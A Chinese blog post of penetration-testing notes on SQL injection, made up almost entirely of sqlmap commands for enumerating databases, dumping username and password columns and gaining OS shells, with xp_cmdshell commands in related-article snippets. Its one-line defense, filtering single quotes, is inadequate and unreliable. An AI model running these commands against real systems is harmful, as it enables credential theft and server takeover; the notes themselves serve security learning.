渗透测试笔记(四)——SQL注入攻击及防御(2)

最新推荐文章于 2024-07-25 14:57:25 发布
最新推荐文章于 2024-07-25 14:57:25 发布
阅读量478 收藏
点赞数
文章标签: sql 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_67044952/article/details/125155792
版权

SQLmap自动化注入

GET方法注入

 sqlmap -u "URL" -dbms=mysql --batch
 sqlmap -u "URL" --dbs
 sqlmap -u "URL" --users
 sqlmap -u "URL" --current-user
 ​
 # 获得当前数据库
 sqlmap -u "URL" --current-db
 ​
 # 获得数据库表
 sqlmap -u "URL" --batch -p username -D wordpress --tables
 ​
 # 获得表的字段
 sqlmap -u "URL" --batch -p username -D wordpress -T wp_users --columns
 ​
 # 获得表中的数据
 sqlmap -u "URL" --batch -D nowasp -T accounts -C "username, password"

POST方法注入

 # 需要Cookie才能访问的页面
 sqlmap -u "URL" --cookie="COOKIE" --batch
 sqlmap -u "URL" --cookie="COOKIE" --batch -p id

注意:复制cookie的时候要把中间的冒号改为等号

数据获取

 --users
 --current-user
 --dbs
 --current-db
 -D "database_name" --tables
 -D "database_name" -T "table_name" --columns
 --dump-all
 --dump-all --exclude-sysdbs
 -D "database_name" -T "table_name" -C "username,password" --dump

提权操作

 # 与数据库交互
 --sql-shell
 ​
 # 操作系统权限
 --os-shell
 --os-cmd=ls /

综合实例

SQL注入防御

开发人员对输入内容进行单引号的过滤

Replyme
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【网络安全工程师面试合集】常用的sql注入手法及防御
请大家直接把问题写在评论区或留言,不要只说一句"你好 或 在吗",我会尽快回复的。
12-05 1293
4.1.6. SQL注入小技巧 4.1.6.1. 宽字节注入 一般程序员用gbk编码做开发的时候,会用 set names 'gbk' 来设定, 这句话等同于 set character_set_connection = 'gbk', character_set_result = 'gbk', character_set_client = 'gbk'; 漏洞发生的原因是执行了 set character_set_client = 'gbk'; 之后,mysql就会认为客户端传过来的数据是gb
安全/渗透面试过程中遇见的一些——SQL注入问题
chuxuezheerer的博客
04-07 1315
主要是记录一下老师上课的内容。就当作课程笔记吧~
渗透测试笔记(三)——SQL注入攻击防御(1)
m0_67044952的博客
06-06 828
程序没有细致的过滤用户输入的数据,致使非法数据侵入系统。1、对于Web应用程序而言,用户核心数据存储在数据库中,例如MySQLSQL Server、Oracle等;2、通过SQL注入攻击,可以获取、修改、删除数据库信息,并且通过提权来控制Web服务器等其他操作;3、SQL注入攻击者通过构造特殊的SQL语句,入侵目标系统,致使后台数据库泄露数据的过程;4、因为SQL注入漏洞造成的严重危害性,所以常年稳居OWASP TOP10榜首。危害:1、拖库导致用户数据泄露;2、危害Web等应用的安全;3、失去操作系统
个人笔记-渗透测试-SQL注入
weixin_48162696的博客
05-20 874
SQL注入原理,sql注入的数据类型,sql注入的提交方式,手工注入sqlmap,基础防御
渗透测试笔记(一)——文件上传漏洞渗透防御
m0_67044952的博客
06-06 1010
测试渗透机:Kali-Linux-2021.4a-vmware-amd64目标靶机:OWASP Broken Web Application VM 1.2 如果恶意文件如PHP、ASP等执行文件绕过Web应用并顺利执行,则相当于黑客拿到了Webshell。一旦黑客拿到Webshell,则可以拿到Web应用数据,删除Web文件,本地提权,进一步拿下整个服务器甚至内网。SQL注入攻击对象是数据库服务,文件上传漏洞主要攻击Web服务,实际渗透两种相结合,达到对目标的深度控制。下面是一个文件上传界面,可以上传图像,
白帽子阅读笔记——SQL注入
gam0n的博客
08-29 457
盲注:服务器没有错误回显时完成的注入攻击 利用了BENCHMARK()函数,该函数用于测试函数性能,利用该函数可以让同一个函数执行若干次,根据返回时间长短变化,判断是否执行成功 通过payload猜测出SQL的版本; 尽量数据库账号时,应该遵循”最小权限原则“ 如果要将文件读出后,将结果返回给攻击者,首先需要当前数据库用户有创建表的权限,首先通过LOAD_FILE()将系统文件读出,在通过...
SQL注入入门(一)——SQL注入初认识
Pz_mstr's Blog
08-13 1183
揭开SQL注入的神秘面纱
Web安全——sql注入
weixin_48888525的博客
10-22 3477
由于我的博客是学到渗透的时候才做的,没有关于WEB漏洞的笔记,现在发现WEB层面的漏洞有些不太熟悉了,边写一下笔记边复习一下,就从sql注入开始吧 话不多说先上表,基本常用的手工注入函数解释都在这 union select 联合查询,联合注入常用 database() 回显当前连接的数据库 version() 查看当前sql的版本如:mysql 1.2.3, mariadb-4.5.6 group_concat() 把产生的同一分组中的值用,连接,形成一个字符串 information
渗透测试笔记——您的安全探索之旅
gitblog_00051的博客
06-04 334
渗透测试笔记——您的安全探索之旅 项目地址:https://gitcode.com/hexrom/PenetrationTesting-Playbook 项目介绍 Penetration Testing Notes 是一个汇集了网络安全领域的丰富知识和实战技巧的开源项目。这个项目按照不同的安全领域划分为多个部分,旨在帮助初级到高级的安全研究人员提升技能,进行有效的渗透测试和系统审计。无论您是热衷...
渗透测试入门——渗透测试笔记
01-27
CMS同样能在网上找到许多漏洞,常用作渗透测试的练习靶机。根据提示,第1题要求找到咨询平台的管理员账号密码;第2题需要登录服务器后台,并插入木马,再用中国菜刀连接,继而找到在管理员桌面上的 flag文件;第3题...
渗透测试笔记——收集于网络
08-05
渗透测试笔记.pdf
学习笔记——sql.zip
06-08
"学习笔记——sql.zip"这个压缩包文件很可能包含了关于SQL的学习资料,如教程、笔记、示例代码等,旨在帮助用户掌握SQL的基本概念、语法和高级特性。 首先,SQL的基础知识包括数据类型,如整型(INT)、浮点型...
渗透测试笔记.rar
02-25
渗透测试是一种安全评估方法,通过模拟黑客攻击行为来检测系统及网络的安全性。这份名为"渗透测试笔记.rar"的压缩包文件包含了两份文档,分别是"渗透测试-实验拓扑环境 2020年1月22日.pdf"和"渗透测试 2020年1月21日...
SQL笔记——学习sql时候的一些笔记SQL基础
10-18
SQL基础知识点总结 SQL(Structured Query Language)是一种用于管理关系数据库管理系统的标准语言。以下是SQL基础知识点总结: 1. SQL基本操作 * SELECT:从数据库表中获取数据 * UPDATE:更新数据库表中的数据 ...
会Excel就会sql
svygh123的专栏
07-20 1239
以上就是通过具体的例子来说明Excel中对应的操作,以便更好地对比SQL,通过这些步骤,你可以直观地在Excel中实现类似数据库操作的功能,SQL就像是数据库世界的Excel,但它更加强大,适用于大规模数据处理和复杂的数据关系管理。虽然开始时可能会觉得SQL语法有些抽象,但一旦掌握了基础,你会发现它非常高效且强大,特别是在处理大量数据和执行复杂查询时。就像在Excel中一样,实践中学习SQL会更加有效,尝试编写一些简单的查询,逐渐增加难度,你会很快上手的!
SQL进阶:解锁高级特性,深化数据洞察
WayneYalejk的博客
07-24 499
掌握了SQL的基础知识后,进一步探索其高级特性将帮助您更高效地处理复杂数据,深化数据分析的广度和深度。本文将带您领略SQL的高级功能,包括窗口函数、存储过程、触发器以及高级查询技巧等,让您在数据处理的道路上更进一步。通过这两篇文章,读者可以从SQL的基础知识逐步深入到高级特性,全面掌握SQL在数据处理和分析中的强大能力。
CTF Web SQL注入 10000字详解
qq_27489877的博客
07-25 1263
SQL注入就是在数据交互中,前端数据传到后台时没有做严格的判断,导致传进来的数据被拼接到sql语句中,被当作sql语句的一部分进行执行,从而导致数据泄露,丢失甚至服务器瘫痪。对其中的特殊字符进行了转义,但在存入数据库时还是原来的数据,数据中一般带有单引号和#号,然后下次使用在拼凑SQL中,所以就形成了二次注入。当原语句的闭合字符遇到转义字符时,会被转义,那么没有闭合符的语句就不完整了,导致报错,通过报错信息我们就可以推断出闭合符。攻击者必须闭合开放的字符串(使用引号),然后注入额外的 SQL 代码。
WEB渗透Web突破篇-SQL注入(MSSQL
最新发布
qq_59468567的博客
07-25 464
EXEC xp_cmdshell "net user"; EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'; EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1'; 激活xp_cmdshell(sql server 2015中默认禁用状态) EXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; REC
BackTrack渗透测试学习笔记概述
笔记涵盖了Metasploit渗透测试指南、信息收集、身份识别、社会工程学攻击、Metasploit运用层攻击、局域网攻击以及维持访问等多个渗透测试的重要环节。作者强调,该笔记并非专业教材,而是个人经验的汇集,适合那些在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值